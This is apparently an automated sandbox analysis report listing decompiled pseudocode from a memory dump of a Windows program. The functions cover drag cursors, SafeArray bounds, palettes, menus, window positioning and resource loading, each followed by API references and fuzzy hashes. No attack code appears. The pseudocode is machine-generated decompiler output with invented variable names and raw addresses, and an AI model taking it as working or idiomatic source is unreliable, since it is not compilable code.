E00438594(intOrPtr* __eax, signed int __edx) { intOrPtr _v16; char _v20; char _v24; char _v28; intOrPtr _t51; intOrPtr _t52; intOrPtr _t55; intOrPtr _t56; intOrPtr _t57; intOrPtr _t58; intOrPtr* _t62; intOrPtr* _t64; struct HICON__* _t67; intOrPtr _t69; intOrPtr* _t74; intOrPtr _t76; intOrPtr* _t77; intOrPtr* _t79; intOrPtr _t82; intOrPtr _t84; intOrPtr _t86; intOrPtr _t88; intOrPtr _t89; struct HWND__* _t92; intOrPtr _t93; intOrPtr _t95; intOrPtr _t96; intOrPtr* _t98; intOrPtr _t102; intOrPtr _t105; intOrPtr _t107; intOrPtr _t108; intOrPtr _t109; intOrPtr _t111; struct HWND__* _t112; intOrPtr _t113; intOrPtr _t115; intOrPtr _t119; intOrPtr* _t122; intOrPtr _t123; void* _t137; intOrPtr _t141; intOrPtr _t147; void* _t163; char _t164; intOrPtr _t166; void* _t173; void* _t174; _t122 = __eax; if( *0x466530 != 0) { L3: _t51 = *0x466510; // 0x0 _t52 = *0x466510; // 0x0 _t166 = E00438468(_t122, *(_t52 + 0x8f) & 0x000000ff, &_v28, _t51); if( *0x466530 == 0) { _t176 = *0x466534; if( *0x466534 != 0) { _t111 = *0x466524; // 0x0 _t112 = GetDesktopWindow(); _t113 = *0x466534; // 0x0 E00443F74(_t113, _t112, _t176, _t111); } } _t55 = *0x466510; // 0x0 if( *((char*)(_t55 + 0x8f)) != 0) { __eflags = *0x466530; _t6 = &_v24; *_t6 = *0x466530 != 0; __eflags = *_t6; *0x466530 = 2; } else { *0x466530 = 1; _v24 = 0; } _t56 = *0x466514; // 0x0 if(_t166 == *((intOrPtr*)(_t56 + 8))) { L12: _t57 = *0x466514; // 0x0 *((intOrPtr*)(_t57 + 0x10)) = *_t122; *((intOrPtr*)(_t57 + 0x14)) = *((intOrPtr*)(_t122 + 4)); _t58 = *0x466514; // 0x0 if( *((intOrPtr*)(_t58 + 8)) != 0) { _t102 = *0x466514; // 0x0 E0043A55C( *((intOrPtr*)(_t102 + 8)), &_v20, _t122); _t105 = *0x466514; // 0x0 *((intOrPtr*)(_t105 + 0x18)) = _v20; *((intOrPtr*)(_t105 + 0x1c)) = _v16; } _t137 = E004384B8(2); _t62 = *0x466514; // 0x0 _t163 = *((intOrPtr*)( *_t62 + 4))( *((intOrPtr*)(_t122 + 4))); if( *0x466534 == 0) { L22: _t64 = *0x462f14; // 0x466584 _t67 = SetCursor(E00454B00( *_t64, _t163)); if( *0x466530 != 2) { goto L34; } _t188 = _t166; if(_t166 != 0) { _t164 = E004384F4(); _t69 = *0x466514; // 0x0 *((intOrPtr*)(_t69 + 0x60)) = _t164; __eflags = _t164; if(__eflags != 0) { E0043A55C(_t164, &_v24, _t122); _t67 = E00403B24(_t164, __eflags); _t141 = *0x466514; // 0x0 *(_t141 + 0x5c) = _t67; } else { _t82 = *0x466514; // 0x0 _t67 = E00403B24( *((intOrPtr*)(_t82 + 8)), __eflags); _t147 = *0x466514; // 0x0 *(_t147 + 0x5c) = _t67; } } else { _push( *((intOrPtr*)(_t122 + 4))); _t84 = *0x466514; // 0x0 _t67 = E00403B24( *((intOrPtr*)(_t84 + 0x40)), _t188); } if( *0x466514 == 0) { goto L34; } else { _t123 = *0x466514; // 0x0 _t42 = _t123 + 0x64; // 0x64 _t43 = _t123 + 0x4c; // 0x4c _t67 = E00408670(_t43, 0x10, _t42); if(_t67 != 0) { goto L34; } if(_v28 != 0) { _t77 = *0x466514; // 0x0 if( *((intOrPtr*)( *_t77 + 0x3c))() != 0) { _t79 = *0x466514; // 0x0 *((intOrPtr*)( *_t79 + 0x34))(); } } _t74 = *0x466514; // 0x0 *((intOrPtr*)( *_t74 + 0x30))(); _t76 = *0x466514; // 0x0 asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); return _t76; } } else { if(_t166 == 0 || ( *(_t166 + 0x51) & 0x00000020) != 0) { L18: _t86 = *0x466534; // 0x0 E00443F50(_t86, _t163); _t88 = *0x466534; // 0x0 _t186 = *((char*)(_t88 + 0x6a)); if( *((char*)(_t88 + 0x6a)) != 0) { _t89 = *0x466534; // 0x0 E00444070(_t89, *((intOrPtr*)(_t122 + 4)), *_t122, __eflags); } else { _t92 = GetDesktopWindow(); _t93 = *0x466534; // 0x0 E00443F74(_t93, _t92, _t186, *((intOrPtr*)(_t122 + 4))); } goto L22; } else { _t95 = *0x466514; // 0x0 if( *((char*)(_t95 + 4)) == 0) { _t96 = *0x466534; // 0x0 E004440E4(_t96, _t137, __eflags); _t98 = *0x462f14; // 0x466584 SetCursor(E00454B00( *_t98, _t163)); goto L22; } goto L18; } } } else { _t67 = E004384B8(1); if( *0x466514 == 0) { L34: return _t67; } _t107 = *0x466514; // 0x0 *((intOrPtr*)(_t107 + 8)) = _t166; _t108 = *0x466514; // 0x0 *((intOrPtr*)(_t108 + 0xc)) = _v28; _t109 = *0x466514; // 0x0 *((intOrPtr*)(_t109 + 0x10)) = *_t122; *((intOrPtr*)(_t109 + 0x14)) = *((intOrPtr*)(_t122 + 4)); _t67 = E004384B8(0); if( *0x466514 == 0) { goto L34; } goto L12; } } _t115 = *0x466520; // 0x0 asm("cdq"); _t173 = (_t115 - *__eax ^ __edx) - __edx - *0x46652c; // 0x0 if(_t173 >= 0) { goto L3; } _t119 = *0x466524; // 0x0 asm("cdq"); _t67 = (_t119 - *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx; _t174 = _t67 - *0x46652c; // 0x0 if(_t174 < 0) { goto L34; } goto L3; } 0x0043859a 0x004385a3 0x004385d2 0x004385d2 0x004385d8 0x004385ef 0x004385f8 0x004385fa 0x00438601 0x00438603 0x00438609 0x00438616 0x0043861b 0x0043861b 0x00438601 0x00438620 0x0043862c 0x0043863c 0x00438643 0x00438643 0x00438643 0x00438648 0x0043862e 0x0043862e 0x00438635 0x00438635 0x0043864f 0x00438657 0x004386a4 0x004386a4 0x004386ab 0x004386b1 0x004386b4 0x004386bd 0x004386c5 0x004386cd 0x004386d2 0x004386db 0x004386e2 0x004386e2 0x004386f0 0x004386f4 0x004386fe 0x00438707 0x0043877e 0x00438781 0x0043878e 0x0043879a 0x00000000 0x00000000 0x004387a0 0x004387a2 0x004387c3 0x004387c5 0x004387ca 0x004387cd 0x004387cf 0x004387fd 0x0043880c 0x00438811 0x00438817 0x004387d1 0x004387d9 0x004387e5 0x004387ea 0x004387f0 0x004387f0 0x004387a4 0x004387a7 0x004387aa 0x004387b7 0x004387b7 0x00438821 0x00000000 0x00438823 0x00438823 0x00438829 0x0043882c 0x00438834 0x0043883b 0x00000000 0x00000000 0x00438842 0x00438844 0x00438850 0x00438852 0x00438859 0x00438859 0x00438850 0x0043885c 0x00438863 0x00438866 0x00438871 0x00438872 0x00438873 0x00438874 0x00000000 0x00438874 0x00438709 0x0043870b 0x0043871e 0x00438720 0x00438725 0x0043872a 0x0043872f 0x00438733 0x00438753 0x00438758 0x00438735 0x00438739 0x00438742 0x00438747 0x00438747 0x00000000 0x00438713 0x00438713 0x0043871c 0x0043875f 0x00438764 0x0043876c 0x00438779 0x00000000 0x00438779 0x00000000 0x0043871c 0x0043870b 0x00438659 0x0043865b 0x00438667 0x0043887b 0x0043887b 0x0043887b 0x0043866d 0x00438672 0x00438675 0x0043867d 0x00438680 0x00438687 0x0043868d 0x00438692 0x0043869e 0x00000000 0x00000000 0x00000000 0x0043869e 0x00438657 0x004385a5 0x004385ac 0x004385b1 0x004385b7 0x00000000 0x00000000 0x004385b9 0x004385c1 0x004385c4 0x004385c6 0x004385cc 0x00000000 0x00000000 0x00000000

APIs

GetDesktopWindow.USER32 ref: 00438609 GetDesktopWindow.USER32 ref: 00438739 SetCursor.USER32(00000000), ref: 0043878E Part of subcall function 004440E4: ImageList_EndDrag.COMCTL32(?,-00000010,00438769), ref: 00444100 SetCursor.USER32(00000000), ref: 00438779

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorDesktopWindow$DragImageList_ String ID: API String ID: 617806055-0 Opcode ID: 3bcd75b5abe411c5b0deca700f6720d75792e6beb4e63713e0ee92e8f9771c6a Instruction ID: 08362208b1a53e947958c9dd7a602420f7f888ca1ef680945a718b5847218c5a Opcode Fuzzy Hash: 3bcd75b5abe411c5b0deca700f6720d75792e6beb4e63713e0ee92e8f9771c6a Instruction Fuzzy Hash: C7915274600240EFC704DF29E986A15B7E1BB48308F15916AF4458B37AEBB8ED45CF6B

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%

E0040F840(signed short* __eax) { char _v260; char _v768; char _v772; signed short* _v776; signed short* _v780; char _v784; signed int _v788; char _v792; intOrPtr* _v796; signed char _t43; intOrPtr* _t60; void* _t79; void* _t81; void* _t84; void* _t85; intOrPtr* _t92; void* _t96; char* _t97; void* _t98; _v776 = __eax; if((_v776[0] & 0x00000020) == 0) { E0040F688(0x80070057); } _t43 = *_v776 & 0x0000ffff; if((_t43 & 0x00000fff) == 0xc) { if((_t43 & 0x00000040) == 0) { _v780 = _v776[4]; } else { _v780 = *(_v776[4]); } _v788 = *_v780 & 0x0000ffff; _t79 = _v788 - 1; if(_t79 >= 0) { _t85 = _t79 + 1; _t96 = 0; _t97 = &_v772; do { _v796 = _t97; _push(_v796 + 4); _t22 = _t96 + 1; // 0x1 _push(_v780); L0040E714(); E0040F688(_v780); _push( &_v784); _t25 = _t96 + 1; // 0x1 _push(_v780); L0040E71C(); E0040F688(_v780); *_v796 = _v784 - *((intOrPtr*)(_v796 + 4)) + 1; _t96 = _t96 + 1; _t97 = _t97 + 8; _t85 = _t85 - 1; } while (_t85 != 0); } _t81 = _v788 - 1; if(_t81 >= 0) { _t84 = _t81 + 1; _t60 = &_v768; _t92 = &_v260; do { *_t92 = *_t60; _t92 = _t92 + 4; _t60 = _t60 + 8; _t84 = _t84 - 1; } while (_t84 != 0); do { goto L12; } while (E0040F7E4(_t83, _t98) != 0); goto L15; } L12: _t83 = _v788 - 1; if(E0040F7B4(_v788 - 1, _t98) != 0) { _push( &_v792); _push( &_v260); _push(_v780); L0040E744(); E0040F688(_v780); E0040FA38(_v792); } } L15: _push(_v776); L0040E2A4(); return E0040F688(_v776); } 0x0040f84c 0x0040f85c 0x0040f863 0x0040f863 0x0040f86e 0x0040f87c 0x0040f88b 0x0040f8a9 0x0040f88d 0x0040f898 0x0040f898 0x0040f8b8 0x0040f8c4 0x0040f8c7 0x0040f8c9 0x0040f8ca 0x0040f8cc 0x0040f8d2 0x0040f8d4 0x0040f8e3 0x0040f8e4 0x0040f8ee 0x0040f8ef 0x0040f8f4 0x0040f8ff 0x0040f900 0x0040f90a 0x0040f90b 0x0040f910 0x0040f92b 0x0040f92d 0x0040f92e 0x0040f931 0x0040f931 0x0040f8d2 0x0040f93a 0x0040f93d 0x0040f93f 0x0040f940 0x0040f946 0x0040f94c 0x0040f94e 0x0040f950 0x0040f953 0x0040f956 0x0040f956 0x0040f959 0x00000000 0x00000000 0x00000000 0x0040f959 0x0040f959 0x0040f960 0x0040f96b 0x0040f973 0x0040f97a 0x0040f981 0x0040f982 0x0040f987 0x0040f992 0x0040f992 0x0040f9a0 0x0040f9a4 0x0040f9aa 0x0040f9ab 0x0040f9bb

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040F8EF SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040F90B SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040F982 VariantClear.OLEAUT32(?), ref: 0040F9AB

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant String ID: API String ID: 920484758-0 Opcode ID: d17882f798cf53baf8a39fefcb7af180c9a2307b2ce2c27e917eb7973a9318f3 Instruction ID: 8ec9ce3e26e7a4601e4635a5e9cb7351c893333f832fa8fc9e86651aa83f5178 Opcode Fuzzy Hash: d17882f798cf53baf8a39fefcb7af180c9a2307b2ce2c27e917eb7973a9318f3 Instruction Fuzzy Hash: 19413F75A012199FCB61EB59CC90BC9B3BCAF48304F4045FAE548F7652DA38AF858F54

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%

E004283D0(intOrPtr __eax, void* __edx) { intOrPtr _v8; void* __ebx; void* __ecx; void* __esi; void* __ebp; intOrPtr _t33; intOrPtr _t59; struct HDC__* _t69; void* _t70; intOrPtr _t79; void* _t84; struct HPALETTE__* _t85; intOrPtr _t87; intOrPtr _t89; _t87 = _t89; _push(_t70); _v8 = __eax; _t33 = _v8; if( *((intOrPtr*)(_t33 + 0x58)) == 0) { return _t33; } else { E004265A0(_v8); _push(_t87); _push(0x4284af); _push( *[fs:eax]); *[fs:eax] = _t89; E004296F8( *((intOrPtr*)(_v8 + 0x58))); E0042824C( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8)); E004297F8( *((intOrPtr*)(_v8 + 0x58))); _t69 = CreateCompatibleDC(0); _t84 = *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8); if(_t84 == 0) { *((intOrPtr*)(_v8 + 0x5c)) = 0; } else { *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t69, _t84); } _t85 = *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 0x10); if(_t85 == 0) { *((intOrPtr*)(_v8 + 0x60)) = 0; } else { *((intOrPtr*)(_v8 + 0x60)) = SelectPalette(_t69, _t85, 0xffffffff); RealizePalette(_t69); } E004268A4(_v8, _t69); _t59 = *0x461eec; // 0x27f1c68 E0041AAF4(_t59, _t69, _t70, _v8, _t85); _pop(_t79); *[fs:eax] = _t79; _push(0x4284b6); return E00426710(_v8); } } 0x004283d1 0x004283d3 0x004283d6 0x004283d9 0x004283e0 0x004284ba 0x004283e6 0x004283e9 0x004283f0 0x004283f1 0x004283f6 0x004283f9 0x00428402 0x00428413 0x0042841e 0x0042842a 0x00428435 0x0042843a 0x00428450 0x0042843c 0x00428446 0x00428446 0x0042845c 0x00428461 0x0042847f 0x00428463 0x0042846f 0x00428473 0x00428473 0x00428487 0x0042848f 0x00428494 0x0042849b 0x0042849e 0x004284a1 0x004284ae 0x004284ae

APIs

Part of subcall function 004265A0: EnterCriticalSection.KERNEL32(00466380,00000000,00424F52,00000000,00424FB1), ref: 004265A8 Part of subcall function 004265A0: LeaveCriticalSection.KERNEL32(00466380,00466380,00000000,00424F52,00000000,00424FB1), ref: 004265B5 Part of subcall function 004265A0: EnterCriticalSection.KERNEL32(00000038,00466380,00466380,00000000,00424F52,00000000,00424FB1), ref: 004265BE Part of subcall function 004297F8: GetDC.USER32(00000000), ref: 0042984E Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00429863 Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042986D Part of subcall function 004297F8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428423,00000000,004284AF), ref: 00429891 Part of subcall function 004297F8: ReleaseDC.USER32 ref: 0042989C CreateCompatibleDC.GDI32(00000000), ref: 00428425 SelectObject.GDI32(00000000,?), ref: 0042843E SelectPalette.GDI32(00000000,?,000000FF), ref: 00428467 RealizePalette.GDI32(00000000), ref: 00428473

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease String ID: API String ID: 979337279-0 Opcode ID: 93bebc2edd455ddf18fa106c5646cc94971223008aa3a34a3a8727028a1c549a Instruction ID: e87ff1c804d76903f950264df5696ada03ea7b14f1511ea4f0a767a0c079a61f Opcode Fuzzy Hash: 93bebc2edd455ddf18fa106c5646cc94971223008aa3a34a3a8727028a1c549a Instruction Fuzzy Hash: AA310934B01664EFD704EB59D981D4DB7F5EF48314B6241AAF804AB362DA38EE40DB54

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00434010(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) { intOrPtr _v8; void* __ecx; void* __edi; int _t27; void* _t40; int _t41; int _t50; _t50 = _t41; _t49 = __edx; _t40 = __eax; if(E004334A8(__eax) == 0) { return GetMenuStringA(__edx, _t50, _a12, _a8, _a4); } _v8 = 0; if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) { _t27 = GetMenuItemID(_t49, _t50); _t51 = _t27; if(_t27 != 0xffffffff) { _v8 = E00433324(_t40, 0, _t51); } } else { _t49 = GetSubMenu(_t49, _t50); _v8 = E00433324(_t40, 1, _t37); } if(_v8 == 0) { return 0; } else { *_a12 = 0; E004090D8(_a12, _a8, *((intOrPtr*)(_v8 + 0x30))); return E00409008(_a12, _t49); } } 0x00434017 0x00434019 0x0043401b 0x00434026 0x00000000 0x004340aa 0x0043402a 0x0043403a 0x00434057 0x0043405c 0x00434061 0x0043406e 0x0043406e 0x0043403c 0x00434043 0x00434050 0x00434050 0x00434075 0x00000000 0x00434077 0x0043407a 0x00434089 0x00000000 0x00434091

APIs

GetMenuState.USER32 ref: 00434033 GetSubMenu.USER32 ref: 0043403E GetMenuItemID.USER32(?,?), ref: 00434057 GetMenuStringA.USER32(?,?,?,?,?), ref: 004340AA

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ItemStateString String ID: API String ID: 306270399-0 Opcode ID: c83668f70c58b27ff1ae3854190cf90560c38d16cda432900dd57c84b320ed91 Instruction ID: 11efe109d52895c86013a67b98394270421268660deb29a3708cc45bd7cb4ea2 Opcode Fuzzy Hash: c83668f70c58b27ff1ae3854190cf90560c38d16cda432900dd57c84b320ed91 Instruction Fuzzy Hash: 0511AF31701214AFC714EE69CC809EF7BE8AF89364F10542AF909D7382CA38AD019768

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 65%

E00429958(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) { intOrPtr _v8; intOrPtr _v12; intOrPtr _t62; intOrPtr _t64; intOrPtr _t67; void* _t77; void* _t78; intOrPtr _t79; intOrPtr _t80; _t77 = _t78; _t79 = _t78 + 0xfffffff8; _v8 = __eax; _v12 = E004038F8(1); _push(_t77); _push(0x4299e0); _push( *[fs:eax]); *[fs:eax] = _t79; *((intOrPtr*)(_v12 + 8)) = __edx; *((intOrPtr*)(_v12 + 0x10)) = __ecx; memcpy(_v12 + 0x18, _a12, 0x15 << 2); _t80 = _t79 + 0xc; _t12 = &_a8; // 0x466368 *((char*)(_v12 + 0x70)) = *_t12 & 0x000000ff; if( *((intOrPtr*)(_v12 + 0x2c)) != 0) { *((intOrPtr*)(_v12 + 0x14)) = *((intOrPtr*)(_v12 + 8)); } _t62 = *0x418b88; // 0x418bd4 *((intOrPtr*)(_v12 + 0x6c)) = E00403AD8(_a4, _t62); _pop(_t64); *[fs:eax] = _t64; EnterCriticalSection(0x466368); _push(_t77); _push(0x429a40); _push( *[fs:edx]); *[fs:edx] = _t80; E004284C0( *((intOrPtr*)(_v8 + 0x28))); *((intOrPtr*)(_v8 + 0x28)) = _v12; E004284BC(_v12); _pop(_t67); *[fs:eax] = _t67; _push(0x429a47); LeaveCriticalSection(0x466368); return 0; } 0x00429959 0x0042995b 0x00429965 0x00429974 0x00429979 0x0042997a 0x0042997f 0x00429982 0x00429988 0x0042998e 0x004299a1 0x004299a1 0x004299a6 0x004299aa 0x004299b4 0x004299bf 0x004299bf 0x004299c5 0x004299d3 0x004299d8 0x004299db 0x004299fc 0x00429a03 0x00429a04 0x00429a09 0x00429a0c 0x00429a15 0x00429a20 0x00429a23 0x00429a2a 0x00429a2d 0x00429a30 0x00429a3a 0x00429a3f

APIs

EnterCriticalSection.KERNEL32(00466368), ref: 004299FC LeaveCriticalSection.KERNEL32(00466368,00429A47,00466368), ref: 00429A3A

Strings

XHB , xrefs: 0042996A hcF , xrefs: 004299A6

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave String ID: XHB$hcF API String ID: 3168844106-4103439798 Opcode ID: ff56ce312c069636ff70dcece962d5d7b289df0c569e2d8a3dddfc511be1f011 Instruction ID: b30c6dabbdf70119b55d85a08352cb78ceca07d7645c1d65d08a879069df6dfc Opcode Fuzzy Hash: ff56ce312c069636ff70dcece962d5d7b289df0c569e2d8a3dddfc511be1f011 Instruction Fuzzy Hash: 75219C74B04308AFC701DF69D88198DBBF5FB89320F6181AAF840A7351D778AE80CB58

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00455BB4(void* __eax, void* __ecx, char __edx) { char _v12; struct HWND__* _v20; int _t17; void* _t27; struct HWND__* _t33; void* _t35; void* _t36; long _t37; _t37 = _t36 + 0xfffffff8; _t27 = __eax; _t17 = *0x466580; // 0x27bf470 if( *((intOrPtr*)(_t17 + 0x30)) != 0) { if( *((intOrPtr*)(__eax + 0x94)) == 0) { *_t37 = *((intOrPtr*)(__eax + 0x30)); _v12 = __edx; EnumWindows(E00455B44, _t37); _t5 = _t27 + 0x90; // 0x0 _t17 = *_t5; if( *((intOrPtr*)(_t17 + 8)) != 0) { _t33 = GetWindow(_v20, 3); _v20 = _t33; if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) { _v20 = 0xfffffffe; } _t10 = _t27 + 0x90; // 0x0 _t17 = *_t10; _t35 = *((intOrPtr*)(_t17 + 8)) - 1; if(_t35 >= 0) { do { _t13 = _t27 + 0x90; // 0x0 _t17 = SetWindowPos(E0041A80C( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213); _t35 = _t35 - 1; } while (_t35 != 0xffffffff); } } } *((intOrPtr*)(_t27 + 0x94)) = *((intOrPtr*)(_t27 + 0x94)) + 1; } return _t17; } 0x00455bb6 0x00455bb9 0x00455bbb 0x00455bc4 0x00455bd1 0x00455bda 0x00455bdd 0x00455be9 0x00455bee 0x00455bee 0x00455bf8 0x00455c06 0x00455c08 0x00455c15 0x00455c17 0x00455c17 0x00455c1e 0x00455c1e 0x00455c27 0x00455c2b 0x00455c2d 0x00455c41 0x00455c4d 0x00455c52 0x00455c53 0x00455c2d 0x00455c2b 0x00455bf8 0x00455c58 0x00455c58 0x00455c62

APIs

EnumWindows.USER32(00455B44), ref: 00455BE9 GetWindow.USER32(00000003,00000003), ref: 00455C01 GetWindowLongA.USER32 ref: 00455C0E SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 00455C4D

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnumLongWindows String ID: API String ID: 4191631535-0 Opcode ID: f23556552e1aea1059882e65ad043ba57e80b2ff24d4e9f5c909e951feda954a Instruction ID: b5efe040d9ee5e4ec0beb5a4be758dd33e8dc33b5e347aa2bed5e18668bfd801 Opcode Fuzzy Hash: f23556552e1aea1059882e65ad043ba57e80b2ff24d4e9f5c909e951feda954a Instruction Fuzzy Hash: F2119E306047509FDB21EB28CC85FA673D4AB05325F1402BAFE58AB2D3C3789C84C76A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0043A4D8(void* __eax, int __ecx, int __edx) { void* _t6; intOrPtr _t16; int _t27; int _t28; int _t29; int _t30; int _t31; int _t32; _t6 = __eax; _t27 = __ecx; _t28 = __edx; _t16 = *((intOrPtr*)(__eax + 0x74)); _t29 = *(_t16 + 0x14); if(_t29 > 0) { _t6 = E00439390(_t16, MulDiv(_t29, __edx, __ecx), 3); } _t30 = *(_t16 + 0xc); if(_t30 > 0) { _t6 = E00439390(_t16, MulDiv(_t30, _t28, _t27), 1); } _t31 = *(_t16 + 0x10); if(_t31 > 0) { _t6 = E00439390(_t16, MulDiv(_t31, _t28, _t27), 2); } _t32 = *(_t16 + 8); if(_t32 > 0) { return E00439390(_t16, MulDiv(_t32, _t28, _t27), 0); } return _t6; } 0x0043a4d8 0x0043a4dc 0x0043a4de 0x0043a4e0 0x0043a4e3 0x0043a4e8 0x0043a4fb 0x0043a4fb 0x0043a500 0x0043a505 0x0043a518 0x0043a518 0x0043a51d 0x0043a522 0x0043a535 0x0043a535 0x0043a53a 0x0043a53f 0x00000000 0x0043a54f 0x0043a558

APIs

MulDiv.KERNEL32(?), ref: 0043A4ED MulDiv.KERNEL32(?), ref: 0043A50A MulDiv.KERNEL32(?), ref: 0043A527 MulDiv.KERNEL32(?), ref: 0043A544

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 343edcee43f4d4a2bc000d28523ac80406228f184dd9ae9d624a554c2fb86fce Instruction ID: f4bc81ab66daf8a9df15c71cec539322716d65d0bf1aec78caf828b6dab18041 Opcode Fuzzy Hash: 343edcee43f4d4a2bc000d28523ac80406228f184dd9ae9d624a554c2fb86fce Instruction Fuzzy Hash: 6A0116613002182BC724BD2B5C45F5B3AADDBC9754F01507E791A9B383EAA9ED2082A8

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 80%

E0041D024(void* __eax, struct HINSTANCE__* __edx, CHAR* _a8) { CHAR* _v8; void* __ebx; void* __ecx; void* __edi; void* __esi; void* __ebp; void* _t18; void* _t23; CHAR* _t24; void* _t25; struct HRSRC__* _t29; void* _t30; struct HINSTANCE__* _t31; void* _t32; _v8 = _t24; _t31 = __edx; _t23 = __eax; _t29 = FindResourceA(__edx, _v8, _a8); *(_t23 + 0x10) = _t29; if(_t29 == 0) { E0041CF84(_t23, _t24, _t29, _t31, _t32); _pop(_t24); } _t5 = _t23 + 0x10; // 0x41d0c0 _t30 = LoadResource(_t31, *_t5); *(_t23 + 0x14) = _t30; if(_t30 == 0) { E0041CF84(_t23, _t24, _t30, _t31, _t32); } _t7 = _t23 + 0x10; // 0x41d0c0 _push(SizeofResource(_t31, *_t7)); _t8 = _t23 + 0x14; // 0x41cd68 _t18 = LockResource( *_t8); _pop(_t25); return E0041CD28(_t23, _t25, _t18); } 0x0041d02b 0x0041d02e 0x0041d030 0x0041d040 0x0041d042 0x0041d047 0x0041d04a 0x0041d04f 0x0041d04f 0x0041d050 0x0041d05a 0x0041d05c 0x0041d061 0x0041d064 0x0041d069 0x0041d06a 0x0041d074 0x0041d075 0x0041d079 0x0041d082 0x0041d08d

APIs

FindResourceA.KERNEL32(?,?,?), ref: 0041D03B LoadResource.KERNEL32(?,0041D0C0,?,?,?,00418C50,?,00000001,00000000,?,0041CF66,00000000,?), ref: 0041D055 SizeofResource.KERNEL32(?,0041D0C0,?,0041D0C0,?,?,?,00418C50,?,00000001,00000000,?,0041CF66,00000000,?), ref: 0041D06F LockResource.KERNEL32(0041CD68,00000000,?,0041D0C0,?,0041D0C0,?,?,?,00418C50,?,00000001,00000000,?,0041CF66,00000000), ref: 0041D079

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

